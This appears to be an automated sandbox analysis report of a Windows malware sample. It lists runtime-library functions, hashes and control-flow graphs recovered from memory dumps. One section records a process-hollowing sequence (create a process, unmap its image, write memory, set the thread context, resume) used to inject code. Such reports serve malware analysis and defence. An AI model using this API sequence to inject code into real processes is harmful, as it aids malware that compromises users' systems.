222414b-222414d 695->696 696->661 696->689
                                APIs
                                • _memset.LIBCMT ref: 02223F51
                                  • Part of subcall function 02225BA8: __getptd_noexit.LIBCMT ref: 02225BA8
                                • __gmtime64_s.LIBCMT ref: 02223FEA
                                • __gmtime64_s.LIBCMT ref: 02224020
                                • __gmtime64_s.LIBCMT ref: 0222403D
                                • __allrem.LIBCMT ref: 02224093
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022240AF
                                • __allrem.LIBCMT ref: 022240C6
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022240E4
                                • __allrem.LIBCMT ref: 022240FB
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02224119
                                • __invoke_watson.LIBCMT ref: 0222418A
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2200000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                • String ID:
                                • API String ID: 384356119-0
                                • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                • Instruction ID: 6c7be8614b2a4b68f9d2509bc6203d0897d041b932b90eb9a039184dc8ee298c
                                • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                • Instruction Fuzzy Hash: D871EAB1A20737BBD714EEB9CC40B6AB3B9BF00324F144169E514E6698EB75DA44CB90

                                Control-flow Graph

                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2200000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                                • String ID:
                                • API String ID: 3432600739-0
                                • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                • Instruction ID: ba362b50bf51c07be495950db48fc647a7e2168973850bb75acabe2aceb534a7
                                • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                • Instruction Fuzzy Hash: DB410432924325BFDB10AFE4D880BBE3BEAEF44314F108429E91456198DB7B955CDF61
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2200000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ExitProcess___crt
                                • String ID:
                                • API String ID: 1022109855-0
                                • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                • Instruction ID: 5637a0abb616393766c5c0af360b361de22e1cdeda49ef3d8d926fab22de6ebc
                                • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                • Instruction Fuzzy Hash: A131C731910671ABCB115F94FC80C4977A9EB14324346856AE908572A4CBB799ECDEA1
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2200000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free_malloc_wprintf$_sprintf
                                • String ID:
                                • API String ID: 3721157643-0
                                • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                • Instruction ID: 9470394cd3b4492f2244c25cd65a95070362e38ed9242bac188ac82faec1ed98
                                • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                • Instruction Fuzzy Hash: 9E1124B29607607AC371A2F40C11EFF3ADD9F45702F4401A9FE8CD1185EB1A9A189BB2
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2200000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throw$_memset$_malloc_sprintf
                                • String ID:
                                • API String ID: 65388428-0
                                • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                • Instruction ID: ec68ad8a6375279d2b3c71bbca9e428aeecea531255293c33d1f9e8b7f1cb194
                                • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                • Instruction Fuzzy Hash: 30516CB1D40219BBEB11DBE1DC86FEFBBB9FB04704F100025FA09B6184E7755A158BA5
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2200000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throw$_memset_sprintf
                                • String ID:
                                • API String ID: 217217746-0
                                • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                • Instruction ID: 96c35ff0ced7df2d7da329fa30ebfeedc48bd7e44e53f9a5dbdd1142e6c5ae36
                                • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                • Instruction Fuzzy Hash: F25191B1E50249BADF11DFE1DD86FEEBBB9EB04704F100025F905B61C1DBB5AA058BA4
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2200000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throw$_memset_sprintf
                                • String ID:
                                • API String ID: 217217746-0
                                • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                • Instruction ID: a9dada9eb853ea0b9896636c1e78ae0613cfae00fae6836d6fe143e57b9d49b4
                                • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                • Instruction Fuzzy Hash: 1F5181B1E50209AADF21DFE1DD85FEEBBB8FB04704F100129F905B61C5EB746A058BA4
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2200000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                                • String ID:
                                • API String ID: 3534693527-0
                                • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                • Instruction ID: e1e496eb2c3e6acca536d7b81b5e404e2f0b2388c2970dfa0a9ad09fe77b4df7
                                • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                • Instruction Fuzzy Hash: 91310832930332FBDB296BE69C00B6E27959F15B64F104615FD08EB29CDF759444CAA1
                                APIs
                                • __getptd_noexit.LIBCMT ref: 022C66DD
                                  • Part of subcall function 022259BF: __calloc_crt.LIBCMT ref: 022259E2
                                  • Part of subcall function 022259BF: __initptd.LIBCMT ref: 02225A04
                                • __calloc_crt.LIBCMT ref: 022C6700
                                • __get_sys_err_msg.LIBCMT ref: 022C671E
                                • __invoke_watson.LIBCMT ref: 022C673B
                                • __get_sys_err_msg.LIBCMT ref: 022C676D
                                • __invoke_watson.LIBCMT ref: 022C678B
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2200000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                                • String ID:
                                • API String ID: 4066021419-0
                                • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                • Instruction ID: 84d08e27a8631ecb4d36a5e3edd35aceb0e110360d0e307c74ad165894afad85
                                • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                • Instruction Fuzzy Hash: BD11CB315207257BEB357EE59C00BFA738DDF80760F20093AFE0896648E726D9044AE4
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2200000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset
                                • String ID: D
                                • API String ID: 2102423945-2746444292
                                • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                • Instruction ID: b677351964ba6d9584c6629c7466dac7f3dc54b3a442dd4c43d98fa31dd17381
                                • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                • Instruction Fuzzy Hash: 2AE16A71D1022AEACF24DFE0CD89FEEB7B8BF04304F144169E909A6194EB756A45CF54
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2200000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset
                                • String ID: $$$(
                                • API String ID: 2102423945-3551151888
                                • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                • Instruction ID: 255c9e4e780902f6664ee555b2903376ed098d708b0d42879aa6adfc1fcda5fe
                                • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                • Instruction Fuzzy Hash: A691AB71D11219AAEF20CFE0C889BEEBBB5EF05308F244169D405772C5DBB65A48CFA5
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2200000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _wcsnlen
                                • String ID: U
                                • API String ID: 3628947076-3372436214
                                • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                • Instruction ID: 494c41c6db7e85fa87a20fc87521e7af974782de2e334424f541d3214cb2b5ec
                                • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                • Instruction Fuzzy Hash: 77215E722343297AEB04DAE49C44BBE73DDDB45351F908065F908CA198FF72E9588A90
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2200000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset
                                • String ID: p2Q
                                • API String ID: 2102423945-1521255505
                                • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                • Instruction ID: 4691633c94c82ebb0735f96065dc731f528b2fc72cf2694c4ee324c53dbd88ba
                                • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                • Instruction Fuzzy Hash: AAF0E578694750B5F7117790BC267857E917B31B09F504044E1142E2E5D3FE234C6799
                                APIs
                                • std::exception::exception.LIBCMT ref: 0224FBF1
                                  • Part of subcall function 0223169C: std::exception::_Copy_str.LIBCMT ref: 022316B5
                                • __CxxThrowException@8.LIBCMT ref: 0224FC06
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2200000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                                • String ID: TeM$TeM
                                • API String ID: 3662862379-3870166017
                                • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                • Instruction ID: 088448bd19ae6356b9148985937339f4c2a4d5df67aba83493ba006beb6648ca
                                • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                • Instruction Fuzzy Hash: 11D067B5D0030CBBCB05EFE5D459CDDBBB9AA04344B408466A91897245EA74A3598F98
                                APIs
                                  • Part of subcall function 0222197D: __wfsopen.LIBCMT ref: 02221988
                                • _fgetws.LIBCMT ref: 0220D15C
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2200000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __wfsopen_fgetws
                                • String ID:
                                • API String ID: 853134316-0
                                • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                • Instruction ID: 6e0fe1ab8560106aeba8e45eaeb499cdb293b974ae15e41269647850c350cece
                                • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                • Instruction Fuzzy Hash: C0919471D21316ABCB20DFE4CC847AEB7B5EF04314F140529E815A7286E7B6AA18CB95
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2200000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _malloc$__except_handler4_fprintf
                                • String ID:
                                • API String ID: 1783060780-0
                                • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                • Instruction ID: 3853f905a1c3183362a89c04f457a0734dd519e6ecf06a48d69b08ecfb17fb21
                                • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                • Instruction Fuzzy Hash: 98A16EB1C10358EBEF11EFE4C845BEEBB76AF14304F144128D8057A296D7B65A48CFA6
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2200000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                • String ID:
                                • API String ID: 2974526305-0
                                • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                • Instruction ID: 6ad348ebcbb3fca6fae7925e818bc74e3669f70fb227972bec7e880564b1fc40
                                • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                • Instruction Fuzzy Hash: 74518370A20326FBDB258EF988847AE77A5AF40324F148729FC35962D8D7779958CB40
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2200000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                • String ID:
                                • API String ID: 3016257755-0
                                • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                • Instruction ID: 3324bc20cc3e85b5077169cef75dd99e868fc753f05a72bf56c32419b41a70c2
                                • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                • Instruction Fuzzy Hash: 3001363246024ABBCF1A5EC4DD018EE3F62BB19358B488415FA5D58828DB76C5B2AB81
                                APIs
                                • ___BuildCatchObject.LIBCMT ref: 022C7A4B
                                  • Part of subcall function 022C8140: ___BuildCatchObjectHelper.LIBCMT ref: 022C8172
                                  • Part of subcall function 022C8140: ___AdjustPointer.LIBCMT ref: 022C8189
                                • _UnwindNestedFrames.LIBCMT ref: 022C7A62
                                • ___FrameUnwindToState.LIBCMT ref: 022C7A74
                                • CallCatchBlock.LIBCMT ref: 022C7A98
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2200000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                • String ID:
                                • API String ID: 2901542994-0
                                • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                • Instruction ID: dda031d57ed18ab4c30d3ec9e17b4314841f7dab98318660f8562a1ff51443a5
                                • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                • Instruction Fuzzy Hash: BC01ED32010509BBCF12AF95CC00EEA7BBAFF88754F258218FD1865124D776E961DFA1

                                Execution Graph

                                Execution Coverage:1.1%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:38
                                Total number of Limit Nodes:8
                                execution_graph 33580 22b0000 33583 22b0630 33580->33583 33582 22b0005 33584 22b064c 33583->33584 33586 22b1577 33584->33586 33589 22b05b0 33586->33589 33592 22b05dc 33589->33592 33590 22b061e 33591 22b05e2 GetFileAttributesA 33591->33592 33592->33590 33592->33591 33594 22b0420 33592->33594 33595 22b04f3 33594->33595 33596 22b04fa 33595->33596 33597 22b04ff CreateWindowExA 33595->33597 33596->33592 33597->33596 33598 22b0540 PostMessageA 33597->33598 33599 22b055f 33598->33599 33599->33596 33601 22b0110 VirtualAlloc GetModuleFileNameA 33599->33601 33602 22b017d CreateProcessA 33601->33602 33603 22b0414 33601->33603 33602->33603 33605 22b025f VirtualFree VirtualAlloc Wow64GetThreadContext 33602->33605 33603->33599 33605->33603 33606 22b02a9 ReadProcessMemory 33605->33606 33607 22b02e5 VirtualAllocEx NtWriteVirtualMemory 33606->33607 33608 22b02d5 NtUnmapViewOfSection 33606->33608 33611 22b033b 33607->33611 33608->33607 33609 22b039d WriteProcessMemory Wow64SetThreadContext ResumeThread 33612 22b03fb ExitProcess 33609->33612 33610 22b0350 NtWriteVirtualMemory 33610->33611 33611->33609 33611->33610 33614 2088026 33615 2088035 33614->33615 33618 20887c6 33615->33618 33624 20887e1 33618->33624 33619 20887ea CreateToolhelp32Snapshot 33620 2088806 Module32First 33619->33620 33619->33624 33621 208803e 33620->33621 33622 2088815 33620->33622 33625 2088485 33622->33625 33624->33619 33624->33620 33626 20884b0 33625->33626 33627 20884c1 VirtualAlloc 33626->33627 33628 20884f9 33626->33628 33627->33628

                                Control-flow Graph

                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 022B0156
                                • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 022B016C
                                • CreateProcessA.KERNELBASE(?,00000000), ref: 022B0255
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 022B0270
                                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 022B0283
                                • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 022B029F
                                • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 022B02C8
                                • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 022B02E3
                                • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 022B0304
                                • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 022B032A
                                • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 022B0399
                                • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 022B03BF
                                • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 022B03E1
                                • ResumeThread.KERNELBASE(00000000), ref: 022B03ED
                                • ExitProcess.KERNEL32(00000000), ref: 022B0412
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                • String ID:
                                • API String ID: 93872480-0
                                • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                • Instruction ID: 515e623b6432bebadb84db6bf8febfd8672a2a8bffdb995ed7104fc4d9f544b3
                                • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                • Instruction Fuzzy Hash: DFB1C574A00209AFDB44CF98C895F9EBBB5BF88314F248158E909AB395D771AE41CF94

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 15 22b0420-22b04f8 17 22b04fa 15->17 18 22b04ff-22b053c CreateWindowExA 15->18 19 22b05aa-22b05ad 17->19 20 22b053e 18->20 21 22b0540-22b0558 PostMessageA 18->21 20->19 22 22b055f-22b0563 21->22 22->19 23 22b0565-22b0579 22->23 23->19 25 22b057b-22b0582 23->25 26 22b05a8 25->26 27 22b0584-22b0588 25->27 26->22 27->26 28 22b058a-22b0591 27->28 28->26 29 22b0593-22b0597 call 22b0110 28->29 31 22b059c-22b05a5 29->31 31->26
                                APIs
                                • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 022B0533
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateWindow
                                • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                • API String ID: 716092398-2341455598
                                • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                • Instruction ID: faced835ec783105f515390789f473564f07bbc0586f42f3a4e69e73dea114a4
                                • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                • Instruction Fuzzy Hash: 92511A70D18388DAEB12CBD8C849BDEBFB66F11748F144058D5447F28AC3BA5658CB66

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 32 22b05b0-22b05d5 33 22b05dc-22b05e0 32->33 34 22b061e-22b0621 33->34 35 22b05e2-22b05f5 GetFileAttributesA 33->35 36 22b0613-22b061c 35->36 37 22b05f7-22b05fe 35->37 36->33 37->36 38 22b0600-22b060b call 22b0420 37->38 40 22b0610 38->40 40->36
                                APIs
                                • GetFileAttributesA.KERNELBASE(apfHQ), ref: 022B05EC
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: AttributesFile
                                • String ID: apfHQ$o
                                • API String ID: 3188754299-2999369273
                                • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                • Instruction ID: fdda3e90313701f4650804e42e302066786bc5effa560e6644cd562e65181171
                                • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                • Instruction Fuzzy Hash: C8011E70C0425DEADB12DBE8C5187EEBFB5AF41348F148099C4492B241D7B69B98CBA1

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 41 20887c6-20887df 42 20887e1-20887e3 41->42 43 20887ea-20887f6 CreateToolhelp32Snapshot 42->43 44 20887e5 42->44 45 20887f8-20887fe 43->45 46 2088806-2088813 Module32First 43->46 44->43 45->46 51 2088800-2088804 45->51 47 208881c-2088824 46->47 48 2088815-2088816 call 2088485 46->48 52 208881b 48->52 51->42 51->46 52->47
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 020887EE
                                • Module32First.KERNEL32(00000000,00000224), ref: 0208880E
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240762289.0000000002088000.00000040.00000020.00020000.00000000.sdmp, Offset: 02088000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2088000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                • String ID:
                                • API String ID: 3833638111-0
                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                • Instruction ID: 685c413e830598dc516034ddd5d263c870aea84ee185dc2c0eeae1fa4b49402e
                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                • Instruction Fuzzy Hash: 18F0F632200718AFD7207BF4A88CB6F76F8AF48725F504128E682D14C0CB70E8455A60

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 66 2088485-20884bf call 2088798 69 208850d 66->69 70 20884c1-20884f4 VirtualAlloc call 2088512 66->70 69->69 72 20884f9-208850b 70->72 72->69
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 020884D6
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240762289.0000000002088000.00000040.00000020.00020000.00000000.sdmp, Offset: 02088000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2088000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                • Instruction ID: 918c4801f75c02c70d8ff791156de75ad711567c15d2f85fae744b3529d7ef05
                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                • Instruction Fuzzy Hash: 92112B79A00208EFDB01DF98C985E99BBF5AF08350F458094F9889B361D375EA90EF80

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 562 22d6437-22d6440 563 22d6466 562->563 564 22d6442-22d6446 562->564 566 22d6468-22d646b 563->566 564->563 565 22d6448-22d6459 call 22d9636 564->565 569 22d646c-22d647d call 22d9636 565->569 570 22d645b-22d6460 call 22d5ba8 565->570 575 22d647f-22d6480 call 22d158d 569->575 576 22d6488-22d649a call 22d9636 569->576 570->563 580 22d6485-22d6486 575->580 581 22d64ac-22d64cd call 22d5f4c call 22d6837 576->581 582 22d649c-22d64aa call 22d158d * 2 576->582 580->570 591 22d64cf-22d64dd call 22d557d 581->591 592 22d64e2-22d6500 call 22d158d call 22d4edc call 22d4d82 call 22d158d 581->592 582->580 598 22d64df 591->598 599 22d6502-22d6505 591->599 601 22d6507-22d6509 592->601 598->592 599->601 601->566
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                                • String ID:
                                • API String ID: 1442030790-0
